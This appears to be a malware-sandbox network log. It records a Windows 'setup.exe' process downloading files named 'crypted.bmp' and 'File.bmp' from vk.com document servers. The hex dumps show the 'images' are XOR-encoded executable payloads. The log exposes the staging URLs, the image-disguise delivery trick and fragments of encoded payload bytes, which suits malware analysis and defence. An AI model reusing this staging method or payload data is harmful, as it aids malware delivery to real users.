2024-07-01 22:05:13 UTC	1219	IN	HTTP/1.1 302 Found Server: kittenx Date: Mon, 01 Jul 2024 22:05:13 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.117350 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Fri, 27 Jun 2025 02:52:25 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9092944805461463727_DtkQ3CUIobNM2Gxry3e19bgTzz0nGnqrsykLnhHF59z; expires=Tue, 01 Jul 2025 22:05:13 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://sun6-22.userapi.com/c235031/u851967711/docs/d58/101acf609709/crypted.bmp?extra=Ux3hmN1iPre6dOlOSIWGtqFvEkIdvKeIAUWi6lAsDtS-lf2EKyAeU1NTXtXwHQmiuKqNE3-DjYe0f5mcu6SGTNHoKn8lJaXQr06BHIPY-Yp_iz6-eS16TocDohevBfPa-7a9dirBWiks X-Frontend: front918004 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: SnE6Qt9P9aEZUqTn60Lkq45cUniEHw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49756	95.142.206.2	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:14 UTC	418	OUT	GET /c235031/u851967711/docs/d58/101acf609709/crypted.bmp?extra=Ux3hmN1iPre6dOlOSIWGtqFvEkIdvKeIAUWi6lAsDtS-lf2EKyAeU1NTXtXwHQmiuKqNE3-DjYe0f5mcu6SGTNHoKn8lJaXQr06BHIPY-Yp_iz6-eS16TocDohevBfPa-7a9dirBWiks HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: sun6-22.userapi.com Connection: Keep-Alive
2024-07-01 22:05:14 UTC	585	IN	HTTP/1.1 200 OK Server: kittenx Date: Mon, 01 Jul 2024 22:05:14 GMT Content-Type: image/x-ms-bmp Content-Length: 957444 Connection: close Last-Modified: Mon, 01 Jul 2024 13:43:00 GMT ETag: "6682b264-e9c04" Expires: Wed, 31 Jul 2024 22:05:14 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic X-Trace-Id: Crc6IQPkHwhcKdVcame9idIKJyFLDQ Accept-Ranges: bytes
2024-07-01 22:05:14 UTC	15799	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 1d 14 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 f8 a9 8d 6d bc c8 e3 3e bc c8 e3 3e bc c8 e3 3e 6f ba e0 3f ad c8 e3 3e 6f ba e6 3f 15 c8 e3 3e 6f ba e7 3f aa c8 e3 3e 7e 49 e7 3f ae c8 e3 3e 7e 49 e0 3f a9 c8 e3 3e 6f ba e2 3f bb c8 e3 3e bc c8 e2 3e 3c c8 e3 3e 7e 49 e6 3f e9 c8 e3 3e 4f 4a ea 3f bd c8 e3 3e 4f 4a e3 3f bd c8 e3 3e 4f 4a e1 3f bd c8 e3 3e 47 7c 76 7d bc c8 e3 3e 15 15 15 15 15 15 15 15 15 15 15 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;1m>>>o?>o?>o?>~I?>~I?>o?>><>~I?>OJ?>OJ?>OJ?>G\|v}>
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: 96 f1 ed 96 f9 41 b4 ff b5 5c 15 26 d1 9c 51 31 45 9e 50 19 9e 40 0d 9e 58 35 46 43 42 9e 68 31 9c 51 31 3d 9c 41 31 31 9c 59 31 0a 90 ea 61 04 9f 14 29 3e 61 11 29 38 60 12 ab 14 15 15 15 fe 17 26 e3 9e 57 0a 30 15 1b 15 15 9c 61 31 01 28 15 1d 15 15 60 34 98 53 17 2e d2 62 0f 95 29 24 25 60 0a 9f 59 24 14 95 ec 6d 61 10 95 ec 4d 60 13 9e e5 9c 61 31 01 9e 57 25 9e 4d 11 9e 05 9c 49 31 35 9e 16 ea 45 11 98 51 31 09 45 de be 1a 15 15 96 d1 11 9c 51 31 09 90 ce 61 06 9e 16 9e 05 ea 45 1d 9e dd 90 dc 61 13 9e 14 7f 14 ea 01 7f 15 42 98 59 31 21 de b4 fc ea ea 96 69 31 ff 1a 98 51 31 39 9e 59 31 0a 1a 52 51 31 39 9e 49 31 09 45 98 11 1a 45 9e 06 44 9e 05 ea 47 09 9e 41 31 31 9e 57 25 9e 5d 11 9c 59 31 35 9e 14 ea 45 11 98 51 31 09 45 de 24 80 15 15 9e 59 31 Data Ascii: A\&Q1EP@X5FCBh1Q1=A11Y1a)>a)8`&W0a1(`4S.b)$%`Y$maM`a1W%MI15EQ1EQ1aEaBY1!i1Q19Y1RQ19I1EEDGA11W%]Y15EQ1E$Y1
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: 1d 9e 15 9c 14 9e d4 d7 1d 15 d9 d9 d9 43 42 7f 11 9e e7 9e ec de c4 2c 17 15 96 d1 11 9c 25 9c 12 9e d2 4a 4b d6 d9 d9 d9 d9 d9 d9 d9 9e 51 31 11 9e 01 d2 15 15 15 15 15 9e d4 9c 04 d7 11 15 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 43 9e 61 31 1d 9e 13 ea c5 de 8c 27 15 15 7f 11 43 de ad 2c 17 15 96 d1 1d 26 d5 4b d7 11 15 d9 9e 17 9c 14 d6 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 9e 17 28 ea ea ea 2a 62 ff d4 f5 17 28 15 01 15 15 67 30 98 5d 36 2e dd 63 3a 44 de 5b 2c 17 15 9e dd 96 d1 11 90 dc 61 1f 98 54 36 96 f5 f5 9c 5d e9 d6 fc bc f4 11 15 90 d5 61 1f 45 de 39 2c 17 15 96 d1 11 d6 26 d5 d6 fc b7 9f ea ea d9 d9 9e d4 d6 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 d9 9e 51 31 11 9e 15 9c 17 d6 d9 d9 d9 d9 d9 d9 d9 43 9e 61 31 1d 42 9e ef 3e ec 42 44 43 de db 42 17 15 Data Ascii: CB,%JKQ1Ca1'C,&K(*b(g0]6.c:D[,aT6]aE9,&Q1Ca1B>BDCB
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: 14 15 15 9e 50 d9 98 58 ad 9e 40 ad 96 ed 1a 1a 82 50 86 63 17 9e df 95 29 2c 15 60 1c d3 50 8b 14 fc dd 15 15 15 9e 58 dd 9c 98 71 ea ea ea 2e dd 1a 96 b1 15 15 15 98 64 14 9c a0 7d ea ea ea 2e db 9e a0 79 ea ea ea 61 65 95 68 86 15 98 48 ad 9c 48 95 9e 48 81 61 16 9c 40 95 96 ed 1a 63 4c 95 28 15 09 5c 15 15 61 45 9e 40 95 54 16 df 96 d5 1d 9c 58 85 16 d7 9e 98 7d ea ea ea 96 f5 ed 54 16 df 9e c5 9c 98 75 ea ea ea 9e dd 2c 50 85 63 16 9c 50 85 2c 00 75 ea ea ea 62 13 9e 98 75 ea ea ea 44 ea 60 85 45 ea 60 95 de 33 74 12 15 9e 50 d9 96 d1 01 9e 40 ad 9e 98 7d ea ea ea 9c 58 dd 98 58 ad 96 ed 1a 63 17 9e df 9e 90 71 ea ea ea 73 d2 11 14 15 15 fe 07 7f 15 ea a0 65 ea ea ea 98 58 ad 7f 14 de 32 c7 ea ea 52 9e db de 4b 1b 15 15 ea 60 9d 9e db de 8d 08 15 15 Data Ascii: PX@Pc),`PXq.d}.yaehHHHa@cL(\aE@TX}Tu,PcP,ubuD`E`3tP@}XXcqseX2RK`
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: 1a 2d 01 c9 1a 3d d3 73 1a eb f5 73 1a 2d 28 c4 2e d4 60 cf 73 1a 65 d7 5b 1a 3d f7 73 1a 2d 28 f5 73 1a 65 d1 a4 73 1a 2d 28 f5 73 1a 6b f4 2e df 6b 43 73 1a 63 f7 9c 58 de 1a 3d 55 01 8c 5d 15 1a 3d d1 73 1a 2d 01 c6 73 1a 65 d7 5b 1a 3d df 73 1a 2d 2e dd 73 1a 65 d4 a4 73 1a 2d 2e dd 73 1a 63 df 73 1a c2 d9 73 1a c2 c4 1a 04 48 f9 36 c4 1a a9 c7 9e df d4 fc 17 9e 61 98 f9 d4 f3 11 16 e7 9e 40 de 16 60 f1 95 68 01 15 61 3c 2e d2 61 ff 9e 1d 2e c4 68 11 9e e5 9e c4 96 d5 11 2e d2 60 fa 4a 9e d3 4b 9e 58 e9 26 d8 de 33 ac 14 15 9e f0 48 d7 19 15 94 d7 15 15 15 95 2e d2 61 04 9e 1d 2e c4 66 11 9e e5 9e c4 96 d5 11 2e d2 60 fa 9e 58 e9 9e d3 4a 26 d8 4b de e2 ad 14 15 9e f0 48 d7 19 15 d9 d9 d9 d9 d9 d9 40 9e f9 96 f9 31 9e 50 1d 9e dd 9e 40 19 9c 40 e9 3c Data Ascii: -=ss-(.`se[=s-(ses-(sk.kCscX=U]=s-se[=s-.ses-.scssH6a@`ha<.a.h.`JKX&3H.a.f.`XJ&KH@1P@@<
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: 9e ed 9e 50 e9 46 ea 60 1d 42 9c 2d 9c 4d 01 9c 65 0a de 0e 33 14 15 9e 58 e9 96 d1 19 26 d5 73 9c 11 4a de 55 7d 15 15 4b 4a 4e dc d7 1d 15 de 5c d9 eb ea d9 40 9e f9 9e 50 19 9e 1d 9e 50 1d 9c 1d 48 d6 40 9e f9 9e 50 19 9e 1d 9e 50 1d 9c 1d 48 d6 40 9e f9 9e 50 19 9e 1d 9e 50 1d 9c 1d 48 d6 40 9e f9 9e 50 19 9e 1d 9e 50 1d 9c 1d 48 d6 40 9e f9 43 9e 60 19 fe 1a 1a a2 13 98 58 0a 45 de 13 48 15 15 96 d3 17 2e 60 01 60 f9 9e 50 1d 9e 58 0a 9e 40 0d 4b 9c 1d 9c 45 11 48 d6 40 9e f9 43 9e 60 19 fe 1a 1a a2 13 98 58 0a 45 de 14 48 15 15 96 d3 17 2e 60 01 60 f9 9e 50 1d 9e 58 0a 9e 40 0d 4b 9c 1d 9c 45 11 48 d6 a5 14 d6 a5 14 d6 d7 15 15 d7 15 15 40 9e f9 43 9e 60 1d ea 60 19 98 53 21 45 43 de 15 e5 ea ea 3e d3 c4 ed 4b 48 d6 40 9e f9 43 9e 60 1d ea 60 19 98 Data Ascii: PF`B-Me3X&sJU}KJN\@PPH@PPH@PPH@PPH@C`XEH.``PX@KEH@C`XEH.``PX@KEH@C``S!EC>KH@C``
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: ea 60 0d 9c 6e 01 ea 60 0a 9e 68 e1 ea 60 01 9c 66 0a ea 60 ed 63 0b 9e 26 43 42 de 7b 35 15 15 9e 58 e9 98 11 58 17 15 15 15 45 43 de 29 f1 eb ea 4c 4c fe 12 46 42 de 47 35 15 15 9e 05 9c 2e de ed 32 15 15 4a 4b 9e d6 4e dc d7 0a 15 de 3f 99 eb ea d9 40 9e f9 96 f9 19 9e 40 1d 46 9e cc 43 ab eb ea ea 6a 9e d3 9e 5e 01 3e d4 9c 58 e9 2e d7 1a 97 b0 15 15 15 9e 56 0a 42 43 98 29 04 9c 50 ed 45 42 de d8 33 15 15 9e e5 96 d1 19 98 5b 14 44 9e 05 de 60 6b 15 15 9e 05 9c 50 e1 de 36 6e 15 15 96 68 ed 12 9e 58 e9 9c 6e 01 9e 68 e1 9c 66 0a 98 21 1c 63 2d 9e 26 98 11 1c 45 43 42 de 92 47 14 15 9e 40 e9 73 9e 50 01 98 19 07 73 9c 11 2c 26 d5 73 9c 51 2c 17 9e 50 ed 98 11 50 17 15 15 15 45 43 de 94 f6 eb ea 96 d1 0a fe 0f 43 46 42 de 41 47 14 15 73 9e 50 01 96 d1 Data Ascii: `n`h`f`c&CB{5XXEC)LLFBG5.2JKN?@@FCj^>X.VBC)PEB3[D`kP6nhXnhf!c-&ECBG@sPs,&sQ,PPECCFBAGsP
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: 3a ea ea ea 14 fe 35 2e d3 68 09 9e 88 19 ea ea ea 3e e5 7f 25 9e 05 de 54 6e eb ea 96 fb 14 60 e7 9e 88 f5 eb ea ea 98 98 6d ea ea ea d3 50 e9 16 de c2 6f eb ea fc e5 ee ea ea ea a0 09 ea ea ea 9e 05 de 06 8f 15 15 91 d5 1a 90 ce ee ea ea 9e a8 01 ea ea ea 9e 12 9e 65 09 98 50 85 45 9e db ea 55 19 97 5d 15 9e da ea c3 9e 98 3d ea ea ea 94 dc 15 17 15 15 96 dc 17 d3 50 e9 13 96 68 b5 15 9c 98 3d ea ea ea 9c 98 35 ea ea ea 63 65 9e 12 9e 65 09 98 90 75 ea ea ea 45 9e db ea 55 19 97 5d 15 9e da ea c3 9e 98 3d ea ea ea 94 dc 15 1d 15 15 7f 12 4d 96 dc 11 9c 50 e9 98 a0 75 ea ea ea 9c 98 3d ea ea ea 9c 98 35 ea ea ea 2c 90 61 ea ea ea 63 13 9e a0 75 ea ea ea 95 6e 11 15 60 18 9e 05 de 42 39 15 15 9e 98 3d ea ea ea 1a a2 56 13 d3 90 3b ea ea ea 14 73 2c 13 61 Data Ascii: :5.h>%Tn`mPoePEU]=Ph=5ceeuEU]=MPu=5,acun`B9=V;s,a
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: e9 9c 53 01 9e d3 96 6b 0a 12 63 10 9e 13 9c 50 e9 98 19 4d 98 11 2a 45 ea 60 1d 44 de b9 cd 15 15 9e 50 e9 98 19 2e 96 d1 19 26 c7 73 9c 0a 5d 9e d3 fe 18 42 ea 60 1d ea 60 e9 42 de c4 69 ea ea 4a 4b 4e dc d7 1d 15 40 9e f9 9e 50 1d 96 6d 0a 12 9e 45 01 63 17 9e 15 47 45 de 67 15 15 15 48 d7 11 15 40 9e f9 44 44 43 9e e4 42 9e 68 1d 9e 5b 01 9e 53 0a 3e d4 9c 58 e9 2e ed 62 2b 46 98 09 2c 46 44 9e db 9c 48 ed de 4a f9 ea ea 9c 4b 01 9e cb 96 6b 0a 12 63 17 9e 0b 9e 50 e9 42 ea 60 19 98 11 56 45 de 93 70 15 15 9e 50 ed 96 d1 19 26 dc 73 9c 19 56 9e d3 4e fe 1a ea 60 19 9e db 42 ea 60 ed 42 de fd 69 ea ea 4a 4b dc d7 1d 15 40 9e f9 44 46 43 9e e4 42 9e 68 19 9e 53 0a 9e 4b 01 3e d6 2e ed 62 56 98 11 2e 45 46 de ef fe ea ea 98 11 2e 9c 60 e9 9c 53 01 9e d3 Data Ascii: SkcPM*E`DP.&s]B``BiJKN@PmEcGEgH@DDCBh[S>X.b+F,FDHJKkcPB`VEpP&sVN`B`BiJK@DFCBhSK>.bV.EF.`S
2024-07-01 22:05:14 UTC	16384	IN	Data Raw: ac 80 eb ea c8 50 09 96 d1 19 9e dd 9c 58 d1 94 eb 15 35 15 15 60 56 cc d5 cc f4 c9 08 e5 08 5c 15 ca f5 e3 d1 54 60 27 98 50 d5 45 44 44 c8 09 31 de 51 0b 16 15 9e 50 d5 ac b5 93 14 15 8c 96 d1 19 26 d7 9e 68 f1 3e d7 9e 48 f5 7c d5 82 60 15 15 8c e2 ec 9e 58 d1 16 dd 98 64 27 c8 cd 2e e6 62 75 61 5f 98 58 c5 96 ea 1a 63 57 95 28 15 09 5c 15 15 9e 58 c5 61 23 98 53 14 56 16 d4 16 cc 9c 50 d1 98 54 1d 16 d2 96 f5 ed 9e ed 9e c5 2e cd 63 17 9e cd 2c 68 d1 62 10 98 43 14 16 c4 47 46 45 44 de 3b f4 10 15 9e 68 f1 96 d1 01 9c 60 f5 98 50 c5 96 ea 1a 63 16 9e 50 c5 d3 11 25 15 fe 18 7f 15 3e e6 98 58 c5 43 de 38 18 eb ea 9e 60 a9 98 50 de 9e 48 ad ea 63 0a 7f 15 45 46 de 10 7c ea ea 96 d1 01 9e dd 96 68 f1 1a 98 50 c5 63 16 9e 50 c5 c8 50 09 44 44 c8 09 31 ea Data Ascii: PX5`V\T`'PEDD1QP&h>H\|`Xd'.bua_XcW(\Xa#SVPT.c,hbCGFED;h`PcP%>XC8`PHcEF\|hPcPPDD1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49755	87.240.132.78	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:14 UTC	526	OUT	GET /doc851967711_678909859?hash=lNew8DPFlC3FkyFwDvSRD3AUel2qUbt8XwQ47izbny0&dl=VoWAeLPwa3VHUZ6RGMrmgXoJxs6sK0ufCNL8HdLsSa4&api=1&no_preview=1#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=3; remixstlid=9092944805461463727_DtkQ3CUIobNM2Gxry3e19bgTzz0nGnqrsykLnhHF59z; remixlgck=374e8ec07457a99dc7; remixstid=242356419_2xqWAu8IaSk4k7yzGaEqYJBhxAcSZqxhFf8GwzSXfco; remixir=1
2024-07-01 22:05:14 UTC	931	IN	HTTP/1.1 302 Found Server: kittenx Date: Mon, 01 Jul 2024 22:05:14 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.117350 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://sun6-21.userapi.com/c235031/u851967711/docs/d19/e642d2d3ea8a/File.bmp?extra=codZE4oOkF_mb0aHMW2_KJkLotDgGHzpcd-JeGF88YLnbk2Qm4WcZoXVvzJ1HuH2HaOhqgSp6_uV0Z6TCfxUYwreX5Rq2H_XmfQYz82S4_LBrsYcRulTXC2HKGtLY-ovV1tbmUk3ivmp X-Frontend: front922200 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: W2zza-uqD-EPbql2CD6KzD9uLCt4NQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49758	95.142.206.1	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:15 UTC	415	OUT	GET /c235031/u851967711/docs/d19/e642d2d3ea8a/File.bmp?extra=codZE4oOkF_mb0aHMW2_KJkLotDgGHzpcd-JeGF88YLnbk2Qm4WcZoXVvzJ1HuH2HaOhqgSp6_uV0Z6TCfxUYwreX5Rq2H_XmfQYz82S4_LBrsYcRulTXC2HKGtLY-ovV1tbmUk3ivmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: sun6-21.userapi.com Connection: Keep-Alive
2024-07-01 22:05:15 UTC	587	IN	HTTP/1.1 200 OK Server: kittenx Date: Mon, 01 Jul 2024 22:05:15 GMT Content-Type: image/x-ms-bmp Content-Length: 2776580 Connection: close Last-Modified: Sat, 29 Jun 2024 15:10:50 GMT ETag: "668023fa-2a5e04" Expires: Wed, 31 Jul 2024 22:05:15 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic X-Trace-Id: yLKjcG73J5J_fCUPBOy5Mt-4uaQLXA Accept-Ranges: bytes
2024-07-01 22:05:15 UTC	15797	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 95 15 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 45 50 15 15 59 14 11 15 75 c4 6a 73 15 15 15 15 15 15 15 15 f5 15 17 14 1e 14 1e 15 15 de 30 15 15 67 11 15 15 15 15 15 5b 12 33 15 15 35 15 15 15 35 33 15 15 15 ff 15 15 35 15 15 15 17 15 15 11 15 15 15 15 15 15 15 11 15 15 15 15 15 15 15 15 f5 3f 15 15 11 15 15 a1 bf 3f 15 17 15 ff 90 15 15 01 15 15 01 15 15 15 15 01 15 15 01 15 15 15 15 15 15 01 15 15 15 15 15 15 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;1EPYujs0g[35535??
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 67 7c ac 15 65 06 39 80 2b 06 25 37 f7 b8 7a ff 06 1e 67 b4 ac 15 65 06 3a 03 06 1f 67 f8 ac 15 65 06 0d 37 b4 03 ba 57 06 3e 03 06 3d 80 2d 1e 02 06 33 37 e3 46 72 57 06 06 02 06 27 80 5a 06 38 02 06 24 03 06 04 67 46 af 15 65 18 37 de 10 d6 57 06 3c 67 aa af 15 65 06 02 67 10 ae 15 65 06 1a 37 6e 5e 60 57 06 07 37 ef 93 12 54 06 55 67 4e ae 15 65 1f 37 c1 ef 3e 54 06 03 37 40 e4 4c 57 06 08 80 76 06 1c 67 90 ae 15 65 19 67 fa ae 15 65 06 37 37 f8 bd 4e 57 06 34 67 36 a9 15 65 06 11 67 9c a9 15 65 06 31 02 06 0a 67 fa a9 15 65 06 19 67 5c a8 15 65 06 36 03 06 35 37 cb 3e 71 57 06 09 37 87 3e 88 57 06 3b 80 09 06 1b 80 40 06 10 67 86 a8 15 65 06 13 37 6b 83 8c 57 06 80 37 d2 16 46 54 06 0e 02 06 01 04 12 3f 06 25 14 15 eb 15 15 15 52 15 15 04 15 03 06 39 Data Ascii: g\|e9+%7zge:ge7W>=-37FrW'Z8$gFe7W<gege7n^`W7TUgNe7>T7@LWvgege77NW4g6ege1geg\e657>qW7>W;@ge7kW7FT?%R9
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 30 67 84 ba 14 65 06 80 67 ae ba 14 65 06 02 80 01 06 06 02 06 10 67 36 a5 14 65 06 0e 09 06 1d 37 e6 f2 19 54 06 0d 80 0e 06 1b 67 4c a5 14 65 06 3c 37 f8 21 9b 54 06 18 67 dc a5 14 65 06 19 03 06 24 37 70 c0 8c 57 06 09 80 1a 06 0a 80 5b 06 39 80 0a 06 33 67 16 a4 14 65 06 3a 80 5a 06 01 67 2a a4 14 65 06 3b 37 d8 15 9a 54 06 04 37 a2 c4 75 57 06 38 37 84 f7 a9 57 06 55 37 e3 b4 4e 57 06 27 37 d4 83 09 57 06 1a 02 1e 03 18 80 1a 1f 67 b4 a4 14 65 06 1c 67 14 a7 14 65 06 11 03 06 3d 04 1e 3f 15 06 25 14 15 04 14 15 15 97 15 15 04 15 37 6f bf 80 57 06 33 03 06 27 37 88 d2 55 57 06 12 67 50 a7 14 65 06 1a 67 60 a7 14 65 06 3b 67 ca a7 14 65 06 35 37 94 92 c4 54 06 3c 37 c4 f7 0c 54 06 13 67 32 a6 14 65 06 55 80 2d 06 30 67 82 a6 14 65 06 37 67 ea a6 14 65 Data Ascii: 0gegeg6e7TgLe<7!Tge$7pW[93ge:Zg*e;7T7uW87WU7NW'7Wgege=?%7oW3'7UWgPeg`e;ge57T<7Tg2eU-0ge7ge
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 2d 06 27 02 06 37 37 0c b1 46 ff 06 1b 80 5c 06 04 03 06 3a 03 06 03 37 cb 1d 73 57 06 07 02 06 0c 37 9a fe f9 54 06 1c 80 03 06 25 37 d2 4b b2 57 06 35 80 4f 06 31 03 06 30 37 4a f3 91 54 06 0a 67 e3 63 17 65 06 1d 80 74 06 0d 02 06 3c 03 06 13 37 02 d7 71 57 06 24 80 58 06 06 37 4b 16 1b 57 06 33 80 50 06 3d 03 1f 02 06 0f 37 5e 55 b9 57 06 01 80 32 06 32 03 06 39 02 06 0b 02 1e 03 06 1e 80 02 06 36 67 75 62 17 65 06 3e 02 06 80 02 06 12 67 d3 62 17 65 06 19 67 23 6d 17 65 06 11 04 0e 3f 15 15 06 25 14 15 0f 14 15 15 3b 14 15 04 15 37 85 60 a4 57 06 11 67 85 6d 17 65 06 37 37 a5 93 95 54 06 39 37 96 19 bb 57 06 18 37 1a 93 96 57 06 13 37 a2 e6 89 ff 06 55 67 df 6d 17 65 06 31 02 06 1a 67 e1 6d 17 65 06 09 67 4b 6c 17 65 19 67 d1 6c 17 65 06 1f 80 48 06 Data Ascii: -'77F\:7sW7T%7KW5O107JTgcet<7qW$X7KW3P=7^UW2296gube>gbeg#me?%;7`Wgme77T97W7W7Ugme1gmegKlegleH
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 03 06 12 37 85 2c 24 57 06 08 37 39 e8 8b 57 06 36 80 4f 06 09 0d 06 1c 67 87 4e 16 65 06 33 02 06 11 80 3c 06 0e 80 26 06 35 03 06 3a 67 cd 4e 16 65 06 02 02 06 03 67 51 49 16 65 06 30 02 06 06 02 06 25 03 06 13 67 a9 49 16 65 06 24 37 34 03 8d 57 1f 03 06 1d 37 c8 c7 c3 54 06 0b 67 e3 49 16 65 06 04 67 21 48 16 65 06 3b 02 06 0d 37 74 a9 73 57 06 37 0e 06 0a 02 06 10 37 d0 7f 55 57 06 32 80 0d 06 38 67 63 48 16 65 06 3f 37 5e e8 b0 54 06 19 03 06 55 15 3f 15 06 25 14 15 ee 15 15 15 7f 14 15 04 15 80 5c 06 25 67 bd 48 16 65 06 02 02 06 19 80 47 06 1d 80 1b 06 09 80 01 06 1b 02 06 18 80 49 06 33 37 db 44 9c 57 06 11 03 06 03 37 b0 d4 95 57 06 06 80 43 06 31 80 52 06 3f 80 31 06 1c 37 99 1e 6a 57 06 0d 80 19 06 12 37 e9 63 a0 54 06 0e 80 1a 06 35 67 11 4b Data Ascii: 7,$W79W6OgNe3<&5:gNegQIe0%gIe$74W7TgIeg!He;7tsW77UW28gcHe?7^TU?%\%gHeGI37DW7WC1R?17jW7cT5gK
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 03 06 36 37 7c 01 d4 57 06 3e 03 06 04 67 3b 5c 11 65 06 1f 67 87 5c 11 65 06 3c 02 06 12 37 30 e3 7b 57 06 10 67 ef 5c 11 65 1e 67 3d 5f 11 65 06 30 0e 18 80 1f 06 33 37 cc 6e 06 54 06 03 67 95 5f 11 65 06 1b 37 c2 68 d9 54 06 1e 37 dc 4c 8b 54 06 0b 67 c9 5f 11 65 06 3b 37 8c 48 a8 57 06 07 37 55 95 13 57 06 37 80 46 06 13 67 41 5e 11 65 06 38 67 91 5e 11 65 06 3f 02 06 0d 02 06 0f 80 43 19 67 c3 5e 11 65 06 80 37 86 d0 03 54 06 0a 37 bb 55 3d 57 06 25 67 51 59 11 65 06 39 37 75 7e d5 ff 06 35 02 06 3a 80 0f 06 02 80 06 06 55 03 06 19 02 06 31 37 5c 87 02 57 06 08 37 46 20 d3 54 06 32 67 b1 59 11 65 06 1c 80 2a 06 0c 67 19 58 11 65 06 18 0b 1f 02 06 1d 80 55 06 34 03 06 24 37 c5 45 a7 54 06 3d 37 42 db 10 57 06 0e 09 06 01 80 42 06 06 15 3f 33 17 3d 31 Data Ascii: 67\|W>g;\eg\e<70{Wg\eg=_e037nTg_e7hT7LTg_e;7HW7UW7FgA^e8g^e?Cg^e7T7U=W%gQYe97u~5:U17\W7F T2gYe*gXeU4$7ET=7BWB?3=1
